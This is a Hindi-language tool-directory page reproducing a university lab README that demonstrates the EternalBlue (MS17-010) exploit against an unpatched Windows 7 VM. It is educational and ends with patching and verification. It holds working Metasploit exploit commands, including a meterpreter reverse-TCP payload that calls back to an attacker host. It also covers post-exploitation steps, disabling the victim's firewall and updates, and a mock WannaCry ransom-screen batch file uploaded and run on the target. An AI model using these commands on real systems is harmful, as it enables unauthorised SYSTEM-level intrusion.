Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
EternalBlue-Exploit-Demonstration-MS17-010 — साइबर सुरक्षा प्रयोगशाला जो CVE-2017-0144 (EternalBlue) के शोषण को Metasploit का उपयोग करके एक कमजोर Windows 7 VM के विरुद्ध प्रदर्शित करती है, जिसमें Meterpreter के माध्यम से SYSTEM-स्तर की पहुंच प्राप्त की जाती है। इसमें पूर्ण आक्रमण श्रृंखला, पोस्ट एक्सप्लॉयटेशन, और MS17-010 पैचिंग के माध्यम से शमन शामिल है, जिसे एक पृथक नैतिक प्रयोगशाला वातावरण में परीक्षण किया गया है। | Kitploit
उपकरण/GitHubGitHub/ichhyak22/eternalblue-exploit-demonstration-ms17-010
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणपोस्ट-शोषणमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

साइबर सुरक्षा प्रयोगशाला जो CVE-2017-0144 (EternalBlue) के शोषण को Metasploit का उपयोग करके एक कमजोर Windows 7 VM के विरुद्ध प्रदर्शित करती है, जिसमें Meterpreter के माध्यम से SYSTEM-स्तर की पहुंच प्राप्त की जाती है। इसमें पूर्ण आक्रमण श्रृंखला, पोस्ट एक्सप्लॉयटेशन, और MS17-010 पैचिंग के माध्यम से शमन शामिल है, जिसे एक पृथक नैतिक प्रयोगशाला वातावरण में परीक्षण किया गया है।

घटना प्रतिक्रिया
लैब और अभ्यास
GitHubichhyak22/eternalblue-exploit-demonstration-ms17-010

EternalBlue-Exploit-Demonstration-MS17-010

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

EternalBlue एक्सप्लॉइट प्रदर्शन (MS17-010)

साइबर सुरक्षा प्रयोगशाला जो CVE-2017-0144 (EternalBlue) का उपयोग करके Metasploit के माध्यम से संवेदनशील Windows 7 सिस्टम के विरुद्ध शोषण का प्रदर्शन करती है, जो Meterpreter के जरिए SYSTEM-स्तरीय पहुँच प्राप्त करती है।

यह परियोजना WannaCry-शैली के रैनसमवेयर हमले (सुरक्षित डेमो) का अनुकरण भी करती है और MS17-010 सुरक्षा पैच का उपयोग करके शमन प्रदर्शित करती है।


मॉड्यूल जानकारी

मॉड्यूल: CSCM828 सुरक्षा कमज़ोरियाँ और प्रवेश परीक्षण

छात्र:

  • Daniel Nicolas Rentapalli (2548048)
  • Ichhya Koirala (2607189)

विश्वविद्यालय: Swansea University


संसाधन और डाउनलोड

  1. MS17-010 EternalBlue SMB रिमोट विंडोज कर्नेल पूल भ्रष्टाचार
    https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/

  2. KB4012212 (Windows 7 x64 सुरक्षा अपडेट)
    https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212%20Windows%207%20x64

  3. Kali Linux (वर्चुअल मशीन डाउनलोड)
    https://www.kali.org/get-kali/#kali-virtual-machines

  4. Windows 7 SP1 होम प्रीमियम अंग्रेज़ी x64 (ISO)
    https://archive.org/details/windows-7-home-prem-english

  5. VMware Workstation Pro
    https://www.vmware.com/products/desktop-hyper


1. अवलोकन

यह प्रयोगशाला प्रदर्शित करती है:

  • SMB कमज़ोरी (MS17-010) का रिमोट शोषण
  • EternalBlue के माध्यम से कर्नेल-स्तरीय पहुँच
  • Meterpreter सत्र स्थापना
  • पोस्ट-एक्सप्लॉइटेशन तकनीकें
  • WannaCry-शैली का रैनसमवेयर अनुकरण (सुरक्षित)
  • पैचिंग के माध्यम से शमन

2. प्रयोगशाला वातावरण

आवश्यकताएँ

  • VMware Workstation / VirtualBox
  • न्यूनतम 8GB RAM

हमलावर मशीन

  • Kali Linux
  • Metasploit Framework

पीड़ित मशीन

  • Windows 7 SP1 x64 (बिना पैच के)

नेटवर्क

  • Host-only / NAT (पृथक वातावरण)
  • सुनिश्चित करें कि दोनों मशीनें संवाद कर सकती हैं

⚠️ यह प्रयोगशाला पूरी तरह से पृथक वातावरण में संचालित की जानी चाहिए।


3. पीड़ित सेटअप (Windows 7)

व्यवस्थापक कमांड प्रॉम्प्ट में चलाएँ:

फ़ायरवॉल अक्षम करें

root@kitploit:~
netsh advfirewall set allprofiles state off

SMB पोर्ट सत्यापित करें

root@kitploit:~
netstat -an | findstr :445

अपडेट अक्षम करें (प्रयोगशाला स्थिरता के लिए)

root@kitploit:~
sc stop wuauserv
sc config wuauserv start= disabled

4. हमलावर सेटअप (Kali Linux)

कनेक्टिविटी सत्यापित करें

root@kitploit:~
ping <victim-ip>
nmap -p 445 <victim-ip>

5. शोषण चरण

चरण 1: लक्ष्य स्कैन करें

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

अपेक्षित:

  • होस्ट VULNERABLE है

चरण 2: एक्सप्लॉइट चलाएँ

root@kitploit:~
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <victim-ip>
set LHOST <attacker-ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

चरण 3: पहुँच की पुष्टि करें

root@kitploit:~
meterpreter > getuid

अपेक्षित:

root@kitploit:~
NT AUTHORITY\SYSTEM

6. पोस्ट-एक्सप्लॉइटेशन

root@kitploit:~
sysinfo
getuid
ps
screenshot
shell
whoami
ipconfig

स्थिर माइग्रेशन

root@kitploit:~
ps
migrate <explorer.exe PID>

7. WannaCry अनुकरण (सुरक्षित डेमो)

पेलोड बनाएँ (Kali)

root@kitploit:~
cat > /tmp/wannacry64.bat << 'EOF'
@echo off
title WannaCryptor Demo - SAFE SIMULATION
color 0a
mode con: cols=80 lines=25
cls

setlocal enabledelayedexpansion

set id=%random%-%random%-%random%
set /a timeleft=60

:main
cls
echo ========================================================
echo           WANNA DECRYPTOR 0.4 x64 (DEMO)
echo ========================================================
echo.
echo  All files have been encrypted!
echo.
echo  Send 0.25 BTC to:
echo  13AM4VWSEwlt4cLnoQNFfqJDwZ8m9dkVml
echo.
echo  Personal ID: %id%
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

echo Initializing encryption...
timeout /t 2 >nul

for /l %%i in (1,1,20) do (
    set /a percent=%%i*5
    call :progress !percent!
    timeout /t 1 >nul
)

goto countdown

:progress
set bar=
set /a blocks=%1/5
for /l %%b in (1,1,!blocks!) do set bar=!bar!#
cls
echo ========================================================
echo           ENCRYPTING FILES...
echo ========================================================
echo.
echo Progress: [%bar%] %1%%
echo.

set /a randfile=%random% %% 5
if !randfile!==0 echo Encrypting: documents.docx
if !randfile!==1 echo Encrypting: photos.jpg
if !randfile!==2 echo Encrypting: database.sql
if !randfile!==3 echo Encrypting: backup.zip
if !randfile!==4 echo Encrypting: project.pptx

exit /b

:countdown
cls

:loop
cls
echo ========================================================
echo           YOUR FILES ARE ENCRYPTED
echo ========================================================
echo.
echo  Pay within the time limit or files will be lost!
echo.
echo  Time remaining: !timeleft! seconds
echo.
echo ========================================================
echo.

if !timeleft! LEQ 0 goto end

set /a timeleft-=1
timeout /t 1 >nul
goto loop

:end
cls
echo ========================================================
echo              TIME EXPIRED
echo ========================================================
echo.
echo  Your files are permanently locked.
echo.
echo  (This was a SAFE DEMO simulation)
echo.
echo ========================================================
pause
EOF

अपलोड और निष्पादित करें

root@kitploit:~
meterpreter > upload /tmp/wannacry64.bat C:\\Windows\\Temp\\wannacry64.bat
meterpreter > execute -f cmd.exe -a "/c start C:\Windows\Temp\wannacry64.bat"

8. शमन (पैच प्रदर्शन)

चरण 1: पैच डाउनलोड करें

  • विज़िट करें: https://www.catalog.update.microsoft.com/
  • खोजें: KB4012212 Windows 7 x64
  • .msu फ़ाइल डाउनलोड करें

चरण 2: पैच स्थापित करें

root@kitploit:~
wusa.exe KB4012212-x64.msu /quiet /norestart

चरण 3: पुनरारंभ करें

root@kitploit:~
shutdown /r /t 0

चरण 4: पैच सत्यापित करें

root@kitploit:~
systeminfo | findstr KB4012212

चरण 5: एक्सप्लॉइट पुनः चलाएँ

अपेक्षित:

  • एक्सप्लॉइट विफल हो जाता है
  • कोई Meterpreter सत्र नहीं

चरण 6: Nmap से सत्यापित करें

root@kitploit:~
nmap -p 445 --script smb-vuln-ms17-010 <victim-ip>

अपेक्षित:

  • NOT VULNERABLE

9. समस्या निवारण

समस्यासमाधान
एक्सप्लॉइट विफल होता हैकनेक्टिविटी जाँचें
कोई सत्र नहींफ़ायरवॉल अक्षम करें
सत्र मर जाता हैएक्सप्लॉइट पुनः प्रयास करें
कोई दृश्य विंडो नहींexplorer.exe में माइग्रेट करें

10. नैतिक विचार

यह परियोजना संचालित की जाती है:

  • केवल नियंत्रित प्रयोगशाला मशीनों पर
  • पूरी तरह से पृथक नेटवर्क में
  • केवल शैक्षिक उद्देश्यों के लिए

अनधिकृत उपयोग उल्लंघन करता है:

  • UK कंप्यूटर मिसयूज़ एक्ट 1990

11. निष्कर्ष

यह प्रयोगशाला प्रदर्शित करती है:

  • EternalBlue का उपयोग करके वास्तविक दुनिया का SMB शोषण
  • Windows 7 का SYSTEM-स्तरीय समझौता
  • रैनसमवेयर हमले का अनुकरण (सुरक्षित)
  • समय पर पैचिंग का महत्व
टूल डाउनलोड करें